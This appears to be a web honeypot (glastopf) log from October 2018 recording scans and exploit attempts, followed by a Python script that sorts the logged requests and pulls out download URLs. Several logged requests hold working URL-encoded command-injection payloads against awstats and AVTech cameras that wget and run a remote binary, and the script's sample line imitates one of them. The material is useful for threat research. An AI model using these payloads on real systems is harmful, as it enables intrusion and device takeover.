2018-10-08 14:09:04,026 (glastopf.glastopf) 185.128.40.182 requested GET /manager/html on 2798c8515bf7:80
2018-10-08 16:47:16,266 (glastopf.glastopf) 183.131.83.169 requested GET /index.action on 2798c8515bf7:80
2018-10-08 18:59:05,722 (glastopf.glastopf) 43.241.252.89 requested GET /webdav/ on 2798c8515bf7:80
2018-10-09 03:37:32,963 (glastopf.glastopf) 185.10.68.123 requested GET /Greetings/Professor/Falken on 2798c8515bf7:80
2018-10-09 04:12:07,565 (glastopf.glastopf) 183.131.83.112 requested GET /manager/html on 2798c8515bf7:80
2018-10-09 16:26:42,457 (glastopf.glastopf) 118.25.139.90 requested GET /webdav/ on 2798c8515bf7:80
2018-10-09 22:44:53,083 (glastopf.glastopf) 58.87.124.178 requested GET /webdav/ on 2798c8515bf7:80
2018-10-09 23:19:14,989 (glastopf.glastopf) 80.82.77.139 requested GET /robots.txt on 2798c8515bf7:80
2018-10-09 23:19:16,050 (glastopf.glastopf) 80.82.77.139 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-09 23:19:16,827 (glastopf.glastopf) 80.82.77.139 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-09 23:19:18,923 (glastopf.glastopf) 80.82.77.139 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-09 23:53:48,378 (glastopf.glastopf) 134.93.17.11 requested GET /manager/html on 2798c8515bf7:80
2018-10-10 07:47:48,273 (glastopf.glastopf) 185.100.87.249 requested POST /sdk on 2798c8515bf7:80
2018-10-10 07:47:48,542 (glastopf.glastopf) 185.100.87.249 requested GET /nmaplowercheck1539157666 on 2798c8515bf7:80
2018-10-10 07:47:49,294 (glastopf.glastopf) 185.100.87.249 requested GET /NmapUpperCheck1539157666 on 2798c8515bf7:80
2018-10-10 07:47:50,274 (glastopf.glastopf) 185.100.87.249 requested GET /Nmap/folder/check1539157666 on 2798c8515bf7:80
2018-10-10 07:47:50,935 (glastopf.glastopf) 185.100.87.249 requested GET /evox/about on 2798c8515bf7:80
2018-10-10 07:47:51,047 (glastopf.glastopf) 185.100.87.249 requested GET /HNAP1 on 2798c8515bf7:80
2018-10-10 13:39:05,576 (glastopf.glastopf) 104.168.151.140 requested GET /Vip/User/Login on 2798c8515bf7:80
2018-10-10 15:34:45,386 (glastopf.glastopf) 122.112.220.223 requested GET /webdav/ on 2798c8515bf7:80
2018-10-10 17:28:27,986 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-10-10 19:15:30,243 (glastopf.glastopf) 119.28.13.87 requested GET /webdav/ on 2798c8515bf7:80
2018-10-10 20:50:18,065 (glastopf.glastopf) 115.231.219.32 requested GET /manager/html on 2798c8515bf7:80
2018-10-10 21:57:50,447 (glastopf.glastopf) 104.168.151.140 requested GET /Vip/User/Login on 2798c8515bf7:80
2018-10-10 22:31:01,655 (glastopf.glastopf) 47.98.42.201 requested GET /webdav/ on 2798c8515bf7:80
2018-10-11 03:26:37,660 (glastopf.glastopf) 59.127.189.160 requested GET /webdav/ on 2798c8515bf7:80
2018-10-11 08:57:23,039 (glastopf.glastopf) 96.68.165.185 requested GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-11 08:57:24,192 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-11 08:57:25,328 (glastopf.glastopf) 96.68.165.185 requested GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| on 2798c8515bf7:80
2018-10-11 11:28:11,591 (glastopf.glastopf) 185.10.68.123 requested GET /Greetings/Professor/Falken on 2798c8515bf7:80
2018-10-11 18:41:43,400 (glastopf.glastopf) 58.57.152.227 requested GET /HNAP1/ on 2798c8515bf7:80
2018-10-11 22:51:42,379 (glastopf.glastopf) 78.52.57.112 requested HEAD /tmpfs/snap.jpg?usr=user&pwd=user on 2798c8515bf7:80
2018-10-12 12:06:44,362 (glastopf.glastopf) 220.167.103.51 requested HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png on 2798c8515bf7:80
2018-10-12 13:02:02,947 (glastopf.glastopf) 60.191.66.218 requested GET /manager/html on 2798c8515bf7:80
2018-10-12 13:05:38,056 (glastopf.glastopf) 121.57.224.223 requested GET http://www.wujieliulan.com/ on 2798c8515bf7:80
2018-10-12 13:05:39,388 (glastopf.glastopf) 110.167.89.201 requested GET http://www.ip.cn/ on 2798c8515bf7:80
2018-10-12 13:05:41,019 (glastopf.glastopf) 110.167.91.174 requested GET http://www.minghui.org/ on 2798c8515bf7:80
2018-10-12 13:05:43,406 (glastopf.glastopf) 110.167.92.28 requested GET http://www.epochtimes.com/ on 2798c8515bf7:80
2018-10-12 13:05:45,938 (glastopf.glastopf) 182.200.179.5 requested GET http://boxun.com/ on 2798c8515bf7:80
2018-10-12 13:38:59,029 (glastopf.glastopf) 220.173.17.190 requested GET http://www.123cha.com on 2798c8515bf7:80
2018-10-12 21:58:12,599 (glastopf.glastopf) 195.22.22.24 requested GET /?a=<foo> on 2798c8515bf7:80
2018-10-13 00:20:33,221 (glastopf.glastopf) 70.71.234.251 requested HEAD /robots.txt on 2798c8515bf7:80
2018-10-13 12:08:52,718 (glastopf.glastopf) 47.93.233.88 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 12:08:54,625 (glastopf.glastopf) 47.93.233.88 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 15:45:21,779 (glastopf.glastopf) 95.85.11.140 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 15:45:22,569 (glastopf.glastopf) 95.85.11.140 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 20:27:15,207 (glastopf.glastopf) 193.112.215.160 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 20:27:18,354 (glastopf.glastopf) 193.112.215.160 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 20:27:55,585 (glastopf.glastopf) 61.216.152.133 requested POST /fndex.html?id=1 on 2798c8515bf7:80
2018-10-13 22:34:44,904 (glastopf.glastopf) 23.253.149.185 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 22:34:45,245 (glastopf.glastopf) 23.253.149.185 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 23:57:26,996 (glastopf.glastopf) 206.189.155.220 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 23:57:30,218 (glastopf.glastopf) 206.189.155.220 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 00:08:25,265 (glastopf.glastopf) 125.212.217.214 requested GET /robots.txt on 2798c8515bf7:80
2018-10-14 00:08:27,979 (glastopf.glastopf) 125.212.217.214 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-14 00:08:30,173 (glastopf.glastopf) 125.212.217.214 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-14 00:08:32,773 (glastopf.glastopf) 125.212.217.214 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-14 03:43:29,424 (glastopf.glastopf) 211.38.126.54 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 03:43:29,559 (glastopf.glastopf) 211.38.126.54 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 07:27:17,809 (glastopf.glastopf) 71.6.199.23 requested GET /robots.txt on 2798c8515bf7:80
2018-10-14 07:27:18,070 (glastopf.glastopf) 71.6.199.23 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-14 07:27:18,331 (glastopf.glastopf) 71.6.199.23 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-14 07:27:18,920 (glastopf.glastopf) 71.6.199.23 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-14 09:57:12,850 (glastopf.glastopf) 134.19.255.22 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-14 10:05:03,910 (glastopf.glastopf) 71.6.202.198 requested GET /ccvv on 2798c8515bf7:80
2018-10-14 13:29:15,802 (glastopf.glastopf) 47.52.248.191 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 13:29:15,914 (glastopf.glastopf) 47.52.248.191 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 20:12:43,991 (glastopf.glastopf) 162.244.81.140 requested GET /muieblackcat on 2798c8515bf7:80
2018-10-14 23:12:48,309 (glastopf.glastopf) 60.171.238.185 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-15 00:18:05,811 (glastopf.glastopf) 118.126.109.214 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 00:18:06,247 (glastopf.glastopf) 118.126.109.214 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 01:01:32,797 (glastopf.glastopf) 93.174.93.67 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-10-15 01:01:33,311 (glastopf.glastopf) 93.174.93.67 requested GET /MyAdmin/ on 2798c8515bf7:80
2018-10-15 01:01:35,408 (glastopf.glastopf) 93.174.93.67 requested GET /myadmin/ on 2798c8515bf7:80
2018-10-15 01:01:36,892 (glastopf.glastopf) 93.174.93.67 requested GET /mysqladmin/ on 2798c8515bf7:80
2018-10-15 01:01:40,955 (glastopf.glastopf) 93.174.93.67 requested GET /sqladmin/ on 2798c8515bf7:80
2018-10-15 01:01:42,458 (glastopf.glastopf) 93.174.93.67 requested GET /mysql/ on 2798c8515bf7:80
2018-10-15 01:01:43,034 (glastopf.glastopf) 93.174.93.67 requested GET /PHPMYADMIN/ on 2798c8515bf7:80
2018-10-15 01:01:43,615 (glastopf.glastopf) 93.174.93.67 requested GET /pHpMyAdMiN/ on 2798c8515bf7:80
2018-10-15 01:17:13,612 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-15 04:06:04,833 (glastopf.glastopf) 66.155.106.108 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 04:06:05,056 (glastopf.glastopf) 66.155.106.108 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 07:44:43,536 (glastopf.glastopf) 95.216.156.77 requested GET /muieblackcat on 2798c8515bf7:80
2018-10-15 18:28:18,278 (glastopf.glastopf) 37.59.57.78 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 18:28:19,997 (glastopf.glastopf) 37.59.57.78 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 20:33:56,644 (glastopf.glastopf) 119.146.87.107 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 20:33:56,998 (glastopf.glastopf) 119.146.87.107 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 01:32:49,260 (glastopf.glastopf) 47.99.84.2 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 01:32:49,741 (glastopf.glastopf) 47.99.84.2 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 04:19:17,865 (glastopf.glastopf) 118.24.18.106 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 05:19:35,632 (glastopf.glastopf) 58.17.148.118 requested GET /HNAP1/ on 2798c8515bf7:80
2018-10-16 19:34:30,189 (glastopf.glastopf) 118.184.54.89 requested GET /upload/bank-icons/bank-gh.jpg on 2798c8515bf7:80
2018-10-16 19:34:30,295 (glastopf.glastopf) 118.184.54.89 requested GET /upload/bank-icons/bank_16.png on 2798c8515bf7:80
2018-10-16 20:45:03,420 (glastopf.glastopf) 146.88.240.128 requested POST / on 2798c8515bf7:80
2018-10-17 00:39:07,727 (glastopf.glastopf) 66.208.15.117 requested GET /webdav/ on 2798c8515bf7:80
2018-10-17 10:24:19,919 (glastopf.glastopf) 220.167.103.51 requested HEAD /newhome/img/logo.png on 2798c8515bf7:80
2018-10-17 17:01:16,622 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-10-17 17:29:42,207 (glastopf.glastopf) 37.6.201.44 requested GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin on 2798c8515bf7:80
2018-10-17 17:29:42,483 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 404: Not Found
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 404: Not Found
2018-10-17 18:10:15,841 (glastopf.glastopf) 68.161.231.230 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-17 18:22:31,505 (glastopf.glastopf) 5.189.164.29 requested GET /manager/html on 2798c8515bf7:80
2018-10-17 18:43:30,015 (glastopf.glastopf) 213.222.234.4 requested GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin on 2798c8515bf7:80
2018-10-17 18:43:30,256 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 404: Not Found
2018-10-18 01:15:42,576 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-18 01:16:05,854 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-18 06:55:40,081 (glastopf.glastopf) 220.167.103.51 requested HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png on 2798c8515bf7:80
2018-10-18 07:35:02,429 (glastopf.glastopf) 197.41.146.118 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-18 08:44:29,798 (glastopf.glastopf) 109.242.196.104 requested GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin on 2798c8515bf7:80
2018-10-18 08:44:30,071 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 404: Not Found
2018-10-18 10:12:44,837 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-18 10:14:46,839 (glastopf.glastopf) 220.167.103.51 requested GET /index/article/lists/cid/3 on 2798c8515bf7:80
2018-10-18 10:30:57,928 (glastopf.glastopf) 46.37.21.50 requested GET /manager/html on 2798c8515bf7:80
2018-10-18 10:53:20,626 (glastopf.glastopf) 222.82.58.239 requested GET http://api.ipify.org/ on 2798c8515bf7:80
2018-10-18 10:53:28,883 (glastopf.glastopf) 221.13.12.142 requested GET http://boxun.com/ on 2798c8515bf7:80
2018-10-18 10:53:28,988 (glastopf.glastopf) 36.106.86.74 requested GET http://www.minghui.org/ on 2798c8515bf7:80
2018-10-18 10:53:29,989 (glastopf.glastopf) 116.252.2.111 requested GET http://www.rfa.org/english/ on 2798c8515bf7:80
2018-10-18 10:53:30,240 (glastopf.glastopf) 101.24.128.157 requested GET http://www.ip.cn/ on 2798c8515bf7:80
2018-10-18 10:53:31,817 (glastopf.glastopf) 106.45.1.49 requested GET http://www.123cha.com/ on 2798c8515bf7:80
2018-10-18 10:53:32,443 (glastopf.glastopf) 222.82.50.124 requested GET http://www.epochtimes.com/ on 2798c8515bf7:80
2018-10-18 17:56:36,025 (glastopf.glastopf) 213.128.88.99 requested GET /manager/html on 2798c8515bf7:80
2018-10-18 18:21:15,753 (glastopf.glastopf) 220.167.103.51 requested GET /index/article/lists/cid/3 on 2798c8515bf7:80
2018-10-18 18:44:20,344 (glastopf.glastopf) 37.49.231.125 requested GET /HNAP1/ on 2798c8515bf7:80
2018-10-18 21:13:19,715 (glastopf.glastopf) 209.141.34.186 requested GET /muieblackcat on 2798c8515bf7:80
2018-10-19 04:25:15,692 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-19 04:25:15,716 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-19 04:25:36,972 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-19 05:48:26,717 (glastopf.glastopf) 118.24.83.141 requested GET /webdav/ on 2798c8515bf7:80
2018-10-19 21:17:01,663 (glastopf.glastopf) 198.20.87.98 requested GET /robots.txt on 2798c8515bf7:80
2018-10-19 21:17:02,050 (glastopf.glastopf) 198.20.87.98 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-19 21:17:02,480 (glastopf.glastopf) 198.20.87.98 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-19 21:17:05,813 (glastopf.glastopf) 198.20.87.98 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-20 03:14:25,618 (glastopf.glastopf) 213.128.88.99 requested GET /manager/html on 2798c8515bf7:80
2018-10-20 08:23:09,144 (glastopf.glastopf) 185.128.40.182 requested GET /manager/html on 2798c8515bf7:80
2018-10-20 15:36:21,793 (glastopf.glastopf) 217.170.203.137 requested GET /yealink/y000000000000.cfg on 2798c8515bf7:80
2018-10-21 10:30:29,800 (glastopf.glastopf) 120.76.234.199 requested GET /manager/html on 2798c8515bf7:80
2018-10-21 12:11:44,007 (glastopf.glastopf) 46.37.21.50 requested GET /manager/html on 2798c8515bf7:80
2018-10-21 19:59:51,019 (glastopf.glastopf) 80.114.11.69 requested GET /webadmin/tpl/style.admin.css on 2798c8515bf7:80
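The log above mixes admin-panel scans, open-proxy checks (absolute `http://` request targets) and URL-encoded command injection that tries to pull a second-stage file. The following is an added example, not part of the original post or of glastopf itself: a triage script that sorts request lines into those groups and extracts the download URLs for blocklisting. The function names, regexes and sample lines are constructed for illustration, using documentation-range addresses.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the log format shown above (documentation-range IPs).
SAMPLE_LOG = """\
2018-10-15 01:01:33,311 (glastopf.glastopf) 192.0.2.10 requested GET /MyAdmin/ on 2798c8515bf7:80
2018-10-15 01:01:43,615 (glastopf.glastopf) 192.0.2.10 requested GET /pHpMyAdMiN/ on 2798c8515bf7:80
2018-10-17 17:01:16,622 (glastopf.glastopf) 192.0.2.20 requested HEAD http://example.com/check_proxy on 2798c8515bf7:80
2018-10-17 17:29:42,207 (glastopf.glastopf) 192.0.2.30 requested GET /cgi-bin/nobody/Search.cgi?username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://198.51.100.7/payload%20-O%20x;%20sh%20x)&password=admin on 2798c8515bf7:80
2018-10-17 17:29:42,483 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 404: Not Found
Traceback (most recent call last):
2018-10-18 10:30:57,928 (glastopf.glastopf) 192.0.2.40 requested GET /manager/html on 2798c8515bf7:80
"""

# Only lines from the request logger are parsed; everything else is skipped.
REQUEST = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d),\d+ \(glastopf\.glastopf\) "
    r"(?P<src>\S+) requested (?P<method>[A-Z]+) (?P<target>.*) on (?P<sensor>\S+)$"
)
SHELL_META = re.compile(r"\$\(|`|;\s*(?:wget|curl|sh|chmod)\b")
FETCH_URL = re.compile(r"(?:wget|curl)\s+(?:-\S+\s+)*(https?://[^\s;)]+)")
ADMIN_PATH = re.compile(
    r"^/(?:manager/html|hnap1/|webdav/|(?:php)?my(?:sql)?admin|sqladmin|mysql|pma)", re.I)


def classify(target):
    """Return (label, fetched_urls) for one request target."""
    decoded = unquote(target)  # %20, %3E etc. hide the shell syntax
    if SHELL_META.search(decoded):
        return "command-injection", FETCH_URL.findall(decoded)
    if re.match(r"https?://", target, re.I):
        return "proxy-probe", []
    if ADMIN_PATH.match(decoded):
        return "admin-panel-scan", []
    return "other", []


def summarize(log_text):
    """Count request classes and collect second-stage URLs."""
    classes, stage2 = Counter(), set()
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # emulator messages and traceback lines are not requests
        label, urls = classify(m["target"])
        classes[label] += 1
        stage2.update(urls)
    return classes, sorted(stage2)
```

Calling `summarize()` on the text of a real `glastopf.log.*` file returns the per-class counts and the sorted list of second-stage URLs; the `other` bucket is what is left for manual review.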